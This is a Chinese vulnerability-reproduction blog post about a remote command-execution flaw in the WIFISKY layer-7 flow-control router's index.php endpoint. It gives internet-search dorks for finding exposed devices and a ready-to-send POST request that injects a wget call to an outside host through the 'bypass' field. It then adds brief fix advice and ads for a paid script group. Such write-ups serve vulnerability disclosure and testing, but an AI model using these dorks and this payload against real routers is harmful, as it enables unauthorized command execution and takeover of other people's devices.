【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

admin 2024年6月30日15:12:25评论13 views字数 761阅读2分32秒阅读模式
0x00

!

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

使

0x01

!

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc
WIFISKY7层流控路由器存在rce, index 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
0x02 空间测绘

!

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc
法:
Fofa:title="WIFISKY 7层流控路由器"quake:title:"WIFISKY 7层流控路由器"hunter:web.title="WIFISKY 7层流控路由器"

0x03 漏洞复现

!

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

登录界面如下:

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

命令执行:

POST /portal/ibilling/index.php HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36{"type":5,"version":2,"bypass":";wget xxxxxx.cn"}

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

0x04 修复意见

!

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

1、请联系厂商进行修复。 

2、在后端过滤用户输入字符。 

3、设置白名单访问。

0x05 nuclei验证脚本获取

!

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

验证脚本已发布到纷传圈子,目前还有几个优惠进入名额,师傅们要进的抓紧哦!后续价格只增不减,错过机会难再遇哦!

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc
0x06 欢迎进群交流

!

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

添加微信进群:

【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

原文始发于微信公众号(网安鲲为帝):【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月30日15:12:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附pochttps://cn-sec.com/archives/2884280.html

发表评论

匿名网友 填写信息